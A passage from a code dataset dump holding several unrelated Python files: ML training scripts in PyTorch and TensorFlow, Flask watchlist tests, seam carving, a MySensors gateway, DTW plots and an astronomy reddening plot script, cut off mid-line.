enumerate(model_ft.named_parameters()):\n print(num, name, param.requires_grad)\nif model_name == 'inception':\n summary(model_ft, input_size=(3, 299, 299))\nelif model_name == 'densenet121' or 'densenet161':\n pass\nelse:\n summary(model_ft, input_size=(3, img_size, img_size))\nprint(model_ft)\n\npytorch_total_params = sum(p.numel() for p in model_ft.parameters() if p.requires_grad)\n# print(\"Total parameters:\", pytorch_total_params)\n# Loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Optimizer \noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\n\n# Learning rate decay\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\n\n# Model training routine \nprint(\"\\nTraining:-\\n\")\n\n\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=30):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_train_acc = 0.0\n best_train_epoch = 0\n best_val_epoch = 0\n best_val_acc = 0.0\n\n # Tensorboard summary\n writer = SummaryWriter(log_dir=('./runs/' + model_name))\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'valid']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device, non_blocking=True)\n labels = labels.to(device, non_blocking=True)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n outputs = model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n if phase == 'train':\n scheduler.step()\n\n epoch_loss = running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # Record training loss and accuracy for each phase\n if phase == 'train':\n writer.add_scalar('Train/Loss', epoch_loss, epoch)\n writer.add_scalar('Train/Accuracy', epoch_acc, epoch)\n writer.flush()\n if epoch_acc > best_train_acc:\n best_train_acc = epoch_acc\n best_train_epoch = epoch\n else:\n writer.add_scalar('Valid/Loss', epoch_loss, epoch)\n writer.add_scalar('Valid/Accuracy', epoch_acc, epoch)\n writer.flush()\n\n # deep copy the model\n if phase == 'valid' and epoch_acc > best_val_acc:\n best_val_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n best_val_epoch = epoch\n print()\n\n time_elapsed = time.time() - since\n\n with open('train_performance.csv', 'a+', newline='') as write_obj:\n csv_writer = csv.writer(write_obj)\n csv_writer.writerow([model_name, '{:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60), pytorch_total_params, '{:4f}'.format(best_train_acc.cpu().numpy()),\n best_train_epoch, '{:4f}'.format(best_val_acc.cpu().numpy()), best_val_epoch])\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\n\n# Train the model\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\n num_epochs=num_epochs)\n# Save the entire model\nprint(\"\\nSaving the model...\")\ntorch.save(model_ft, PATH)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112771977","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport random\r\nimport Parameters\r\nimport Net\r\nfrom Data import CreateDataWithLabel1, Accuracy\r\n\r\nresult = []\r\nfor num in range(100):\r\n # Import Data\r\n pulset = np.load(\"gpulse.npy\")\r\n labelt = np.load(\"glabel.npy\")\r\n\r\n n_total = labelt.shape[0]\r\n print(\"数据集中共有%d人\" % (n_total))\r\n r = 0\r\n while 1:\r\n idx = list(range(n_total))\r\n random.shuffle(idx)\r\n\r\n pulse_train_people = pulset[idx[0:Parameters.n_examples]]\r\n pulse_test_people = pulset[idx[Parameters.n_examples:n_total]]\r\n label_train_people = labelt[idx[0:Parameters.n_examples]]\r\n label_test_people = labelt[idx[Parameters.n_examples:n_total]]\r\n p_train = 0\r\n n_train = 0\r\n p_test = 0\r\n n_test = 0\r\n\r\n for i in range(label_train_people.shape[0]):\r\n if label_train_people[i] == 0:\r\n n_train += 1\r\n else:\r\n p_train += 1\r\n print(\"训练集中\")\r\n print(\"怀孕%d人\" % (p_train))\r\n print(\"未怀孕%d人\" % (n_train))\r\n\r\n for i in range(label_test_people.shape[0]):\r\n if label_test_people[i] == 0:\r\n n_test += 1\r\n else:\r\n p_test += 1\r\n print(\"测试集中\")\r\n print(\"怀孕%d人\" % (p_test))\r\n print(\"未怀孕%d人\" % (n_test))\r\n r = p_test / (p_test + n_test)\r\n print(\"怀孕人数占比%.2f\" % (r))\r\n if r > 0.6 or r < 0.4:\r\n print(\"测试集中怀孕人数比例过高或过低,重新分组\")\r\n else:\r\n break\r\n\r\n pulse_train, label_train = CreateDataWithLabel1(\r\n pulse_train_people, label_train_people)\r\n pulse_test, label_test = CreateDataWithLabel1(\r\n pulse_test_people, label_test_people)\r\n\r\n for i in range(pulse_train.shape[0]):\r\n pmax = max(pulse_train[i])\r\n pmin = min(pulse_train[i])\r\n pulse_train[i] = (2 * pulse_train[i] - pmin - pmax) / (pmax - pmin)\r\n\r\n for i in range(pulse_test.shape[0]):\r\n pmax = max(pulse_test[i])\r\n pmin = min(pulse_test[i])\r\n pulse_test[i] = (2 * pulse_test[i] - pmin - pmax) / (pmax - pmin)\r\n\r\n print(\"数据处理完成\")\r\n\r\n # Tensorflow\r\n x = tf.placeholder('float', [None, Parameters.input_size])\r\n y = tf.placeholder('float', [None, Parameters.output_size])\r\n\r\n keep_probs = tf.placeholder('float', [None])\r\n pred = Net.ResNet(x)\r\n\r\n loss = -tf.reduce_mean(y * tf.log(pred))\r\n\r\n #loss = tf.reduce_mean(tf.square(pred-y))\r\n '''\r\n n_pregnancy = 0\r\n n_npregnancy = 0\r\n for i in range(labelt.size):\r\n if labelt[i] > Parameters.PWeek:\r\n label.append([1,0])\r\n pulse.append(pulset[i][period[i][0]:(period[i][0]+Parameters.input_size)])\r\n n_pregnancy += 1\r\n elif labelt[i] == 0:\r\n label.append([0,1])\r\n pulse.append(pulset[i][period[i][0]:(period[i][0]+Parameters.input_size)])\r\n n_npregnancy += 1\r\n print(n_pregnancy, n_npregnancy)\r\n '''\r\n global_step = tf.Variable(0)\r\n learning_rate = tf.train.exponential_decay(\r\n 0.05, global_step, 1000, 0.96, staircase=True)\r\n optm = tf.train.GradientDescentOptimizer(\r\n learning_rate).minimize(loss, global_step=global_step,)\r\n\r\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(pred, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n init_op = tf.global_variables_initializer()\r\n savedir = \"tmp/\"\r\n saver = tf.train.Saver(max_to_keep=5)\r\n with tf.Session() as sess:\r\n sess.run(init_op)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n pulse_train = np.array(pulse_train)\r\n label_train = np.array(label_train)\r\n pulse_train = pulse_train.astype('float')\r\n\r\n n_train = pulse_train.shape[0]\r\n print(n_train)\r\n num_batch = int(n_train / Parameters.Batch_size)\r\n idx_ = list(range(n_train))\r\n TT = []\r\n TRAIN_ACC = []\r\n TEST_ACC = []\r\n for epoch in range(Parameters.Epoch):\r\n total_cost = 0\r\n random.shuffle(idx_)\r\n for i in range(num_batch):\r\n pulse_in = pulse_train[idx_[\r\n i * Parameters.Batch_size:(i + 1) * Parameters.Batch_size], :]\r\n label_in = label_train[idx_[\r\n i * Parameters.Batch_size:(i + 1) * Parameters.Batch_size], :]\r\n feeds = {x: pulse_in, y: label_in}\r\n sess.run(optm, feed_dict=feeds)\r\n total_cost += sess.run(loss, feed_dict=feeds)\r\n\r\n pred_train = sess.run(pred, feed_dict={x: pulse_train})\r\n\r\n TRAIN_ACC.append(sess.run(accuracy, feed_dict={\r\n x: pulse_train, y: label_train}))\r\n TT.append(total_cost)\r\n\r\n m_pred = sess.run(pred, feed_dict={x: pulse_test})\r\n acc = Accuracy(m_pred, label_test)\r\n print('测试集精确率', acc)\r\n\r\n TEST_ACC.append(acc)\r\n print(\"训练完成\")\r\n # np.savetxt('TT.txt', np.array(TT) )\r\n # np.savetxt('TR.txt', np.array(TRAIN_ACC))\r\n # np.savetxt('TE.txt',np.array(TEST_ACC))\r\n saver.save(sess, savedir + 'pulseend')\r\n coord.request_stop()\r\n coord.join(threads)\r\n result.append(acc)\r\nprint(result)\r\n","sub_path":"yuyan/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163116568","text":"#-*- coding:utf-8 -*-\n\nfrom app.collection.models import Watchlist\nfrom app.collection.tasks import add_to_watchlist, find_torrents_for_movies\nfrom app.core.models import Notification\nfrom app.movies.models import Movie\nfrom app.torrents.models import Torrent\n\nfrom tests import BaseTestCase, UserFactory\n\n\nclass AddToWatchlistTaskTestCase(BaseTestCase):\n def test_add_missing_movies_to_watchlist(self):\n with self.instance.test_request_context() as request:\n u = UserFactory()\n self.db.session.commit()\n\n user_id = u.id\n\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n add_to_watchlist(keys=keys, user_id=user_id)\n\n watchlist = self.db.session.query(Watchlist).filter_by(\n user_id=user_id).all()\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.SUCCESS_STATUS).all()\n\n self.assertEqual(len(watchlist), 3)\n self.assertEqual(len(notifications), 1)\n\n def test_add_movies_to_watchlist(self):\n with self.instance.test_request_context() as request:\n u = UserFactory()\n self.db.session.commit()\n\n user_id = u.id\n\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n Movie.add(keys=keys)\n\n add_to_watchlist(keys=keys, user_id=user_id)\n\n watchlist = self.db.session.query(Watchlist).filter_by(\n user_id=user_id).all()\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.SUCCESS_STATUS).all()\n\n self.assertEqual(len(watchlist), 3)\n self.assertEqual(len(notifications), 1)\n\n\nclass FindTorrentsForMoviesTestCase(BaseTestCase):\n def test_find_torrents_for_movies(self):\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n movies = Movie.add(keys=keys)\n self.assertEqual(len(movies), 3)\n\n find_torrents_for_movies(keys=keys)\n\n torrents = self.db.session.query(Torrent).all()\n self.assertTrue(len(torrents) > 0)\n\n torrents = self.db.session.query(Torrent).join(\n Movie.torrents).filter(Movie.id == 2).all()\n self.assertEqual(len(torrents), 5)\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.INFO_STATUS).all()\n self.assertEqual(len(notifications), 1)\n","sub_path":"tests/collection/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277504826","text":"from dskc.clean import get_text_from\nfrom dskc.visualization import graphs\nfrom dskc.visualization.graphs.types.word_cloud.word_cloud import word_cloud, text_proportion_success\nfrom dskc._util.string import get_display_text\nimport pandas as pd\nfrom . import util\nfrom matplotlib import pyplot as plt\n\n\ndef _wordcloud(series, section_number, sub_section, display_name, stop_words):\n sub_section = util.header(section_number, sub_section, \"{} Word Cloud\".format(display_name))\n\n word_cloud(series, stop_words=stop_words)\n return sub_section\n\n\ndef _top_words(words_series, top_words, section_number, sub_section, display_name):\n sub_section = util.header(section_number, sub_section, \"{} Top {} Words\".format(display_name, top_words))\n\n graphs.bars(words_series,\n title=\"Top {} words\".format(top_words),\n xlabel=\"Word\",\n percentage_on_top=True,\n max_values=top_words)\n\n return sub_section\n\n\ndef _text_proportion_succcess(series, words_series, target_series, target_true, top_words, section_number, sub_section,\n display_name):\n sub_section = util.header(section_number, sub_section,\n \"{} Mean Success of Top {} Words\".format(display_name, top_words))\n\n text_proportion_success(words_series, series, target_series,\n target_true=target_true)\n return sub_section\n\n\ndef text_col(df, name, target=None, target_true=False, section_number=1, top_words=15, stop_words=[]):\n # get names\n display_name = get_display_text(name)\n sub_section = 1\n\n # set series\n series = df[name]\n\n # wordcloud\n sub_section = _wordcloud(series, section_number, sub_section, display_name, stop_words)\n\n # bars graph\n text = get_text_from(series, stop_words=stop_words)\n\n # set word series\n words = text.split(\" \")\n words_series = pd.Series(words)\n\n # top n words\n sub_section = _top_words(words_series, top_words, section_number, sub_section, display_name)\n\n # text proportion graphs\n if not target is None:\n try:\n _text_proportion_succcess(series,\n words_series,\n df[target],\n target_true,\n top_words,\n section_number,\n sub_section,\n display_name)\n except:\n plt.show()\n print(\"\\nNot available.\\n\")\n","sub_path":"dskc/visualization/graphs/shortcuts/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192582817","text":"\n\n\ndef write_detail(id,text,mod):\n with open(r'./client/data_storage/train_detail_%s.log' % id, mod, encoding='UTF-8') as f:\n if mod != 'r+':\n f.write(text)\n else:\n old = f.read()\n f.seek(0)\n f.write(text)\n f.write(old)\n","sub_path":"test/client/federation/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156881832","text":"import numpy as np\n\n\ndef get_intensity(img):\n weights = np.array([0.299, 0.587, 0.114])\n return img @ weights\n\n\ndef get_intensity_with_mask(intensities, mask):\n intensity_with_mask = intensities.copy()\n\n h, w = intensities.shape\n intensity_with_mask += h * w * 256 * mask\n\n return intensity_with_mask\n\n\ndef get_intensities_sum(grad_intensity):\n intensity_sum = grad_intensity.copy()\n h, w = grad_intensity.shape\n for i in range(1, h):\n add = np.zeros(w)\n last_block = np.array([intensity_sum[i - 1, 1:-1], intensity_sum[i - 1, 2:], intensity_sum[i - 1, :-2]])\n add[1:-1] = np.min(last_block, axis=0)\n add[0] = np.min(intensity_sum[i - 1, :2])\n add[-1] = np.min(intensity_sum[i - 1, -2:])\n intensity_sum[i] += add\n\n return intensity_sum\n\n\ndef get_min_seam(sum_intensity):\n seam = np.zeros(sum_intensity.shape)\n h, w = sum_intensity.shape[:2]\n y = np.argmin(sum_intensity[h - 1])\n seam[h - 1, y] = 1\n for x in range(h - 1, -1, -1):\n start = max(0, y - 1)\n end = min(y + 2, w)\n diff = np.argmin(sum_intensity[x, start: end])\n y = start + diff\n seam[x, y] = 1\n return seam\n\n\ndef get_grad_intensity(image):\n I_x = np.roll(image, 1, axis=0) - np.roll(image, -1, axis=0)\n I_y = np.roll(image, 1, axis=1) - np.roll(image, -1, axis=1)\n I_x[0, :] = image[1, :] - image[0, :]\n I_x[-1, :] = image[-1, :] - image[-2, :]\n I_y[:, 0] = image[:, 1] - image[:, 0]\n I_y[:, -1] = image[:, -1] - image[:, -2]\n intensity_grad = (I_x ** 2 + I_y ** 2) ** 0.5\n return intensity_grad\n\n\ndef get_seam_mask(seam, shape):\n mask = np.zeros(shape)\n rows = list(range(len(seam)))\n mask[rows, seam] = 1\n return mask\n\n\ndef shrink_seam(new_image, mask, min_seam):\n for index, pixel_to_shrink in enumerate(min_seam):\n new_image[index, pixel_to_shrink: -1] = new_image[index, pixel_to_shrink + 1:]\n if mask is not None:\n mask[index, pixel_to_shrink: -1] = mask[index, pixel_to_shrink + 1:]\n new_image = new_image[:-1]\n if mask is not None:\n mask = mask[:-1]\n return new_image, mask\n\n\ndef expand_seam(new_image, mask, min_seam):\n h, w, d = new_image.shape\n big_image = np.zeros((h, w + 1, d))\n big_image[:, :-1] = new_image\n big_mask = mask\n # print('image shape: ', new_image.shape, 'big image shape: ', big_image.shape)\n if mask is not None:\n big_mask = np.zeros((h, w + 1))\n big_mask[:, :-1] = mask\n for index, pixel_to_expand in enumerate(min_seam):\n if pixel_to_expand == w - 1:\n value_to_add = new_image[index, pixel_to_expand]\n else:\n value_to_add = np.mean(new_image[index, pixel_to_expand:pixel_to_expand + 2])\n # print('image shape: ', new_image[index, pixel_to_expand:].shape, 'big image shape: ',\n # big_image[index, pixel_to_expand + 1:].shape)\n big_image[index, pixel_to_expand + 1:] = new_image[index, pixel_to_expand:]\n big_image[index, pixel_to_expand + 1] = value_to_add\n if mask is not None:\n big_mask[index, pixel_to_expand + 1:] = mask[index, pixel_to_expand:]\n big_mask[index, pixel_to_expand] = 1\n return big_image, big_mask\n\n\ndef seam_carve(image, mode, mask=None):\n # if mask is not None:\n # print(mode, 'with mask')\n # else:\n # print(mode)\n\n new_image = image.copy()\n intensity = get_intensity(new_image)\n grad_intensity = get_grad_intensity(intensity) # get_grad_intensity(intensity)\n\n if mask is not None:\n grad_intensity = get_intensity_with_mask(grad_intensity, mask)\n\n if 'vertical' in mode:\n grad_intensity = grad_intensity.T\n if mask is not None:\n mask = mask.T\n new_image = new_image.transpose((1, 0, 2))\n\n intensity_sum = get_intensities_sum(grad_intensity)\n min_seam = get_min_seam(intensity_sum)\n # seam_mask = get_seam_mask(min_seam, new_image.shape[:2])\n seam = get_min_seam(intensity_sum)\n\n # print(len(min_seam))\n # print(new_image.shape)\n\n # if 'shrink' in mode:\n # new_image, mask = shrink_seam(new_image, mask, min_seam)\n # if 'expand' in mode:\n # new_image, mask = expand_seam(new_image, mask, min_seam)\n\n if 'vertical' in mode:\n if mask is not None:\n mask = mask.T\n seam = seam.T\n # # new_image = new_image.transpose((1, 0, 2))\n\n return image, mask, seam\n","sub_path":"gml 02 Scaling/seam_carve.py","file_name":"seam_carve.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38323623","text":"'''\nCreated on 12 sept. 2015\n\n@author: doudz\n'''\nfrom pySensors.MyController import Gateway\nimport threading\nfrom pySensors.MySensor import MySensor,AUTO,build\nimport time\nfrom pySensors.MyMessage import MyMessage,mSetCommand\n\nSLEEP = 1/10.\n\nclass pyGateway(Gateway, threading.Thread):\n \"\"\" MySensors gateway \"\"\"\n\n def __init__(self, event_callback=None, persistence=False,\n persistence_file=\"mysensors.pickle\", protocol_version=\"1.5\"):\n threading.Thread.__init__(self)\n Gateway.__init__(self, event_callback, persistence, persistence_file,\n protocol_version)\n self._stop_event = threading.Event()\n self.gw = MySensor()\n self.gw.begin(self._callback,0,True,0)\n \n def _callback(self,gw,message):\n data = u'{0.sender};{0.destination};{0.command};{0.ack};{0.type};{0.payload}'.format(message)\n print(type(data),data)\n# response = self.logic(data)\n response = self.logic(message)\n print('response',response)\n if response:\n print('response',response.encode())\n print(response.node_id,response.child_id,response.type,response.ack,response.sub_type,response.payload)\n msg = MyMessage(response.node_id,response.sub_type)\n print('type,command',response.type)\n print('subtype,type',response.sub_type)\n msg.sender = gw.nc.nodeId\n msg.destination = response.node_id\n msg.miSetRequestAck(response.ack)\n msg.miSetCommand(response.type)\n if response.sub_type in [4,8]:\n msg.set_byte(chr(response.payload))\n else:\n msg.set(response.payload)\n #msg.set_byte(chr(response.payload))\n print(msg.data)\n gw.sendRoute(msg)\n \n\n def stop(self):\n \"\"\" Stops the background thread. \"\"\"\n self._stop_event.set()\n\n def run(self):\n \"\"\" Background thread that reads messages from the gateway. \"\"\"\n while not self._stop_event.is_set():\n self.gw.process()\n time.sleep(SLEEP)\n \n# try:\n# msg = line.decode('utf-8')\n# response = self.logic(msg)\n# except ValueError:\n# LOGGER.warning('Error decoding message from gateway, probably received bad byte.')\n# continue\n# if response is not None:\n# try:\n# self.send(response.encode())\n# except ValueError:\n# LOGGER.exception('Invalid response')\n# continue\n\n def send(self, message):\n \"\"\" Writes a Message to the gateway. \"\"\"\n print('send',message)\n# self.serial.write(message.encode())\n\n\ndef RepeaterNode():\n print('Starting RepeaterNode, press Ctrl+C to exit')\n gw = MySensor()\n # The third argument enables repeater mode.\n gw.begin(None, AUTO, True);\n #Send the sensor node sketch version information to the gateway\n gw.sendSketchInfo(\"Repeater Node\", \"1.0\");\n try:\n while True:\n gw.process()\n time.sleep(SLEEP)\n except KeyboardInterrupt:\n print(\"\\n Program stopped \\n\")\n \ndef pGateway(callback):\n print('Starting Gateway, press Ctrl+C to exit')\n gw = MySensor()\n gw.begin(callback,0,True,0)\n \n try:\n while True:\n gw.process()\n time.sleep(SLEEP)\n except KeyboardInterrupt:\n print(\"\\n Program stopped \\n\")\n \n \nif __name__ == '__main__':\n #RepeaterNode()\n \n def mycallback(message):\n print(message)\n \n Gateway(mycallback)\n \n \n \n \n","sub_path":"pySensors/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612374092","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotting(x, y, e, f, path,fig,L,colour):\n \n \n xaxis = [x1[0] for x1 in path]\n yaxis = [y1[1] for y1 in path]\n \n q = np.arange(0,len(xaxis),1)\n \n for j in q:\n e.append(xaxis[j])\n \n for k in q:\n f.append(yaxis[k])\n \n plt.figure(fig)\n \n plt.plot(xaxis,yaxis,colour,label='Column number ' + L +' in the X-ray data matrix')\n \n plt.legend()\n \n plt.title('Alignment between UV and X-ray data')\n \n plt.xlabel('UV data')\n plt.ylabel('X-ray data')\n \n plt.show()\n \n return(e,f)\n\n\n\n\ndef plotting1(x, y, path,fig,L,colour):\n \n \n xaxis = [x1[0] for x1 in path]\n yaxis = [y1[1] for y1 in path]\n \n plt.figure(fig)\n \n plt.plot(xaxis,yaxis,colour,label=L)\n \n plt.legend()\n \n plt.title('Comparison between DTW and FastDTW alignment')\n \n plt.xlabel('UV Data')\n plt.ylabel('X-ray Data')\n \n plt.show()\n\n\n\n\ndef plotting2(y, path,fig,L,colour):\n \n plt.figure(fig)\n \n plt.plot(y,colour,label='Column number ' + L +' in the X-ray data matrix')\n \n plt.legend()\n \n plt.title('X-ray data by column')\n \n plt.xlabel('Time')\n plt.ylabel('X-ray Data')\n \n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dtwpy/plotTest.py","file_name":"plotTest.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261315414","text":"#!/usr/bin/python\n# encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport os\nimport subprocess\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.table import Table, Column \nfrom scipy.stats import linregress\nfrom scipy import interpolate\nfrom scipy import polyval, polyfit\nfrom scipy import odr\nimport pylab as py\nfrom matplotlib import gridspec\nimport sklearn.datasets as ds\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\nfrom redTools import *\nfrom Kcorrect import *\nfrom linear_mcmc import *\n################################################################# \ndef add_axis(ax, xlim, ylim):\n \n x1, x2 = xlim[0], xlim[1]\n y1, y2 = ylim[0], ylim[1]\n ax.set_xlim(x1, x2)\n ax.set_ylim(y1, y2)\n\n ax.minorticks_on()\n ax.tick_params(which='major', length=7, width=1.5)\n ax.tick_params(which='minor', length=4, color='#000033', width=1.0) \n \n # additional Y-axis (on the right)\n y_ax = ax.twinx()\n y_ax.set_ylim(y1, y2)\n y_ax.set_yticklabels([])\n y_ax.minorticks_on()\n y_ax.tick_params(which='major', length=7, width=1.5, direction='in')\n y_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n\n # additional X-axis (on the top)\n x_ax = ax.twiny()\n x_ax.set_xlim(x1, x2)\n x_ax.set_xticklabels([])\n x_ax.minorticks_on()\n x_ax.tick_params(which='major', length=7, width=1.5, direction='in')\n x_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n \n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n \n########################################################### Begin\ndef plot_array(inFile, scatter=False, binned=True):\n \n R, Input_u1, T_u1 = getBand(inFile, band1 = 'u', band2 = 'w1')\n R, Input_g1, T_g1 = getBand(inFile, band1 = 'g', band2 = 'w1')\n R, Input_r1, T_r1 = getBand(inFile, band1 = 'r', band2 = 'w1')\n R, Input_i1, T_i1 = getBand(inFile, band1 = 'i', band2 = 'w1')\n R, Input_z1, T_z1 = getBand(inFile, band1 = 'z', band2 = 'w1')\n Input1 = {} ; T1 = {}\n T1[\"u\"] = T_u1\n T1[\"g\"] = T_g1\n T1[\"r\"] = T_r1\n T1[\"i\"] = T_i1\n T1[\"z\"] = T_z1\n Input1[\"u\"] = Input_u1\n Input1[\"g\"] = Input_g1\n Input1[\"r\"] = Input_r1\n Input1[\"i\"] = Input_i1\n Input1[\"z\"] = Input_z1\n \n R, Input_u2, T_u2 = getBand(inFile, band1 = 'u', band2 = 'w2')\n R, Input_g2, T_g2 = getBand(inFile, band1 = 'g', band2 = 'w2')\n R, Input_r2, T_r2 = getBand(inFile, band1 = 'r', band2 = 'w2')\n R, Input_i2, T_i2 = getBand(inFile, band1 = 'i', band2 = 'w2')\n R, Input_z2, T_z2 = getBand(inFile, band1 = 'z', band2 = 'w2')\n Input2 = {} ; T2 = {}\n T2[\"u\"] = T_u2\n T2[\"g\"] = T_g2\n T2[\"r\"] = T_r2\n T2[\"i\"] = T_i2\n T2[\"z\"] = T_z2\n Input2[\"u\"] = Input_u2\n Input2[\"g\"] = Input_g2\n Input2[\"r\"] = Input_r2\n Input2[\"i\"] = Input_i2\n Input2[\"z\"] = Input_z2 \n \n \n dye = {\"u\":\"blue\",\"g\":\"green\",\"r\":\"red\",\"i\":\"orange\",\"z\":\"maroon\",\"w1\":\"purple\" }\n \n fig = py.figure(figsize=(5, 4), dpi=100) \n fig.subplots_adjust(wspace=0, top=0.95, bottom=0.15, left=0.15, right=0.98)\n \n gs = gridspec.GridSpec(1, 1, height_ratios=[1]) \n\n p = 0\n ####################################################\n \n band_lst = ['r']\n \n for jj in range(1):\n \n \n for band in band_lst:\n \n ylabel=True\n xlabel=True\n \n ax = plt.subplot(gs[p]) ; p+=1\n plot_Rinc(ax, T1[band], Input1[band], T2[band], Input2[band], color=dye[band], scatter=scatter, binned=binned, xlabel=xlabel, ylabel=ylabel, band=band)\n yticks = ax.yaxis.get_major_ticks()\n #if band!='u': yticks[-1].label1.set_visible(False)\n #if band!='u': plt.setp(ax.get_yticklabels(), visible=False) \n \n #####################################################\n \n plt.subplots_adjust(hspace=.0, wspace=0)\n\n ax = fig.add_subplot(111)\n ax.set_axis_off()\n ax.set_xticks([])\n ax.set_yticks([])\n ax.xaxis.set_ticks_position('none')\n ax.yaxis.set_ticks_position('none') \n #ax.annotate(r'$A_{W2}-A_{W1} \\/\\/ [mag]$', (0.008,0.56), xycoords='figure fraction', size=16, color='black', rotation=90)\n \n #ax.annotate(r'$inclination \\/ [deg]$', (0.52,0.02), xycoords='figure fraction', size=16, color='black')\n \n fig.savefig(\"P0_w12.eps\")\n fig.savefig(\"P0_w12.png\")\n plt.show()\n \n################################################################## \ndef plot_Rinc(ax, T1, Input1, T2, Input2, color='red', scatter=False, binned=False, xlabel=True, ylabel=True, X_twin=True, Y_twin=True, band='r'):\n \n myDic = {}\n \n pgc = Input1[0]\n pc0 = Input1[2]\n inc = Input1[3]\n table = T1[5]\n Epc0 = table['Epc0']\n Einc = table['inc_e']\n a,b,c,d, alpha, beta, gamma, Ealpha, Ebeta = getReddening_params(band1=band, band2='w1')\n q2 = 10**(-1.*gamma)\n F = log_a_b(inc, q2)\n dF2 = Elogab2(inc, q2, Einc)\n A1 = F*(a*pc0**3+b*pc0**2+c*pc0+d)\n dA1 = np.sqrt(dF2*(a*pc0**3+b*pc0**2+c*pc0+d)**2+(F*(3*a*pc0**2+2*b*pc0+c)*Epc0)**2)\n for i in range(len(pgc)):\n myDic[pgc[i]]=[pc0[i],Epc0[i]]\n \n\n pgc = Input2[0]\n pc0 = Input2[2]\n inc = Input2[3]\n table = T2[5]\n Epc0 = table['Epc0']\n Einc = table['inc_e']\n a,b,c,d, alpha, beta, gamma, Ealpha, Ebeta = getReddening_params(band1=band, band2='w2')\n q2 = 10**(-1.*gamma)\n F = log_a_b(inc, q2)\n dF2 = Elogab2(inc, q2, Einc)\n A2 = F*(a*pc0**3+b*pc0**2+c*pc0+d)\n dA2 = np.sqrt(dF2*(a*pc0**3+b*pc0**2+c*pc0+d)**2+(F*(3*a*pc0**2+2*b*pc0+c)*Epc0)**2)\n PC_w1 = []\n PC_w2 = []\n EPC_w1 = []\n EPC_w2 = []\n for i in range(len(pgc)):\n if pgc[i] in myDic:\n PC_w2.append(pc0[i])\n EPC_w2.append(Epc0[i])\n PC_w1.append(myDic[pgc[i]][0])\n EPC_w1.append(myDic[pgc[i]][1])\n \n \n PC_w1 = np.asarray(PC_w1)\n PC_w2 = np.asarray(PC_w2)\n EPC_w1 = np.asarray(EPC_w1)\n EPC_w2 = np.asarray(EPC_w2)\n if scatter:\n ax.plot(PC_w1, 